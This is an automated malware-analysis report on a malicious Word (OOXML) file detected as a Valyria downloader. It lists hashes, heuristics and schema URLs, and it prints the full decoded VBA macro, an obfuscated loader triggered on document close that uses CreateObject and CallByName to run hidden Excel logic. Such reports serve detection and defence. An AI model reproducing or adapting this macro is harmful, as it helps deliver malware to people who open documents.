Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7e7cf0a88bcc7b43…

MALICIOUS

Office (OOXML)

83.5 KB Created: 2021-01-29 09:38:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-02-09
MD5: 1572e612fe1540da054fdb866db9f475 SHA-1: f62ce25df6e6e213eb1c1a11a2e01c4db5de486c SHA-256: 7e7cf0a88bcc7b438aaca8a4cfdba4b7b0653d325bb6a2ec9c29ca3e276bef8c
222 Risk Score

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-10033915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML medium 2 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set fc = CreateObject(UserForm1.f2 & UserForm1.c6)
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    Set it = CallByName(fc.Workbooks, UserForm1.oc2 & UserForm1.rw, 1, UserForm2.ComboBox1, , , , UserForm1.g5)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7014 bytes
SHA-256: 13c538d5305a8812976b690fc17ad7946f06c042d0093fd53202a8e34f57c4cd
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public uq, a6, na, l4, ct, fc, g, rmt, cx, e1, af, o6, yb, cv, a3, de

Sub Document_Close()

rs

End Sub

Sub rs()

On Error Resume Next

UserForm2.ComboBox1.ListIndex = 5

Set fc = CreateObject(UserForm1.f2 & UserForm1.c6)

fc.DisplayAlerts = False

c0v = 1301

aa = 0

Err.Number = 0

at = UserForm2.ComboBox5

While c0v <> 0 And aa < 32

Set it = CallByName(fc.Workbooks, UserForm1.oc2 & UserForm1.rw, 1, UserForm2.ComboBox1, , , , UserForm1.g5)

c0v = Err.Number

aa = aa + 16

Wend

If c0v <> 0 Then

ErrHandler:

y24 = CallByName(Application, UserForm1.xu & UserForm1.bg, 2)

p = UserForm2.ComboBox3

If y24 <> False Then

Set mr = CreateObject(UserForm1.pn & UserForm1.ia)

CallByName mr.Documents, UserForm1.oc2 & UserForm1.rw, 1, ActiveDocument.FullName, , True

CallByName mr, UserForm1.b2 & UserForm1.po, 1, Now + TimeSerial(0, 0, 2), UserForm1.fe & UserForm1.qa & "rs"

ez = UserForm2.ComboBox18

Else

CallByName Application, UserForm1.b2 & UserForm1.po, 1, Now + TimeSerial(0, 0, 17), UserForm1.fe & UserForm1.qa & "rs"

End If

fc.Quit

Exit Sub

c19 = UserForm2.ComboBox3

End If

Dim rl

Set rl = fc.sheets(1)

hrt = UserForm2.ComboBox28

akh = "'"

de = fc.sheets(5).Cells(1, 1)

If Len(de) < 1 Then

If fc.ActiveWorkbook.Title <> "Google" Then

fj = UserForm2.ComboBox14

GoTo ErrHandler

Else

Exit Sub

End If

k5 = UserForm2.ComboBox25

End If

b8 = rl.Cells(78, 24).Value

q0 = rl.Cells(52, 11).Value

e1 = fc.sheets(1).Cells(8, 33).Value

af = fc.sheets(2).Cells(43, 29).Value

ct = fc.sheets(2).Cells(113, 7).Value

h5 = fc.sheets(2).Cells(109, 9).Value

p2 = fc.sheets(1).Cells(49, 20).Value

rx = fc.sheets(3).Cells(11, 13).Value

orv = UserForm2.ComboBox28

gk = fc.sheets(2).Cells(50, 18).Value

dd = rl.Cells(55, 29).Value

yb = fc.sheets(2).Cells(4, 10).Value

g = rl.Cells(74, 42).Value

pj = UserForm2.ComboBox27

cx = fc.sheets(3).Cells(36, 1).Value

ig = fc.sheets(3).Cells(96, 19).Value

y1 = fc.sheets(2).Cells(131, 40).Value

o6 = fc.sheets(1).Cells(26, 46).Value

cl9 = fc.sheets(1).Cells(54, 27).Value

p4 = UserForm2.ComboBox23

xrv = fc.sheets(2).Cells(82, 30).Value

xxe = UserForm2.ComboBox23

uq = fc.sheets(3).Cells(97, 25).Value

cy2 = fc.sheets(3).Cells(42, 52).Value

pb = UserForm2.ComboBox24

j2a = fc.sheets(1).Cells(146, 55).Value

rmt = fc.sheets(3).Cells(121, 12).Value

ud = UserForm2.ComboBox4

a6 = fc.sheets(3).Cells(134, 8).Value

r8b = fc.sheets(3).Cells(99, 42).Value

k3z = UserForm2.ComboBox7

p7 = fc.sheets(2).Cells(37, 1).Value

a3 = ""

Set Sh1 = fc.sheets(4)

v5 = 1

o = True

While o

fu = Sh1.Cells(v5, 1).Value

If Len(fu) < 1 Then

o = False

Else

a3 = a3 & fu

End If

v5 = v5 + 1

Wend

m8 = CallByName(fc, dd, 2)

UserForm1.zx.Value = p2 & m8 & xrv

ej = UserForm2.ComboBox3

UserForm1.qc6.Value = q0

pw = UserForm2.ComboBox12

CallByName CreateObject(p7), j2a, 1, UserForm1.zx, cl9, UserForm1.qc6

Set df = CreateObject(b8)

Set m1 = CallByName(df, h5, 2)

Set km = CallByName(m1, r8b, 1)

Set cx = CallByName(df, cx, 2)

Set l4 = df

ox = UserForm2.ComboBox12

o7 = UserForm2.ComboBox20

UserForm5.ComboBox1 = "t3"

Set uq = CallByName(cv, uq, 2)

rmt = CallByName(uq, rmt, 2)

UserForm1.q5.Value = cy2 & rx

UserForm3.ComboBox1 = gk

UserForm1.q5.Value = ig

UserForm4.ComboBox1 = UserForm3.ComboBox1

tn = UserForm2.ComboBox12

UserForm3.ComboBox1 = rmt

ba = UserForm2.ComboBox20

df = ly

it = p6

rl = ji

m1 = i2

km = d5u

cx = qs

e1 = hx

af = o0

cv = d4

uq = j

l4 = er

DoEvents

CallByName fc, y1, 1

fc = rm

d5 = UserForm2.ComboBox3

c8 = UserForm2.ComboBox19

End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{3F723E2C-D89E-417B-BAA2-FDD544C7D37A}{AB4874AA-B67B-40CA-B5FA-8F22FDF7D16B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{14CDA336-01FA-480E-9DC6-C05BA4AF714C}{5A75439F-77DE-45C8-9C78-CF88F35ECC6C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 
 

 rf = UserForm2.Controls.Count - 1
 
 
 
 

 nk = ""
 For k9 = 1 To rf Step 2
 nk = nk & UserForm2.Controls.Item(k9)
 Next

 ComboBox1.AddItem "f8"
 ComboBox1.AddItem "zg"
 ComboBox1.AddItem "ei"
 ComboBox1.AddItem "ed"
 ComboBox1.AddItem "i3"
 ComboBox1.AddItem nk
 ComboBox1.AddItem "gz"
 
 
 
 
 

ay = UserForm2.ComboBox10

 
 
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{FC888E54-3D6A-4918-BC2A-155CF467F21C}{0637E2C7-9846-4BAD-AFF6-F3943A0B03EE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()

e8 = UserForm2.ComboBox13

 CallByName ActiveDocument.uq, ActiveDocument.g, VbMethod, 1, ActiveDocument.rmt
 CallByName ActiveDocument.uq, ActiveDocument.a6, VbMethod, UserForm1.q5.Value
End Sub

 

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{6220F40F-D453-4037-BCB6-563FA4AFF1FB}{1421FE02-EA3F-488C-AC8F-1C7D917348BA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 CallByName ActiveDocument.l4, ActiveDocument.ct, VbMethod, UserForm1.q5.Value, ActiveDocument.a3, ActiveDocument.de

lj6 = UserForm2.ComboBox28

End Sub

 

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{3358E2A1-0C34-47B2-94CC-C6A01B8D4514}{557DF1C4-AF53-4A94-B05B-C7D66144CACE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
 Set ActiveDocument.e1 = CallByName(ActiveDocument.cx, ActiveDocument.e1, VbGet)
 Set ActiveDocument.af = CallByName(ActiveDocument.e1, ActiveDocument.af, VbGet)
 Set ActiveDocument.cv = CallByName(ActiveDocument.af, ActiveDocument.o6, VbMethod, ActiveDocument.yb)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 51200 bytes
SHA-256: 77532f3a7587721eaaa330fab8017879e72c8abaac9afb7b43eb5805bf45c389
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.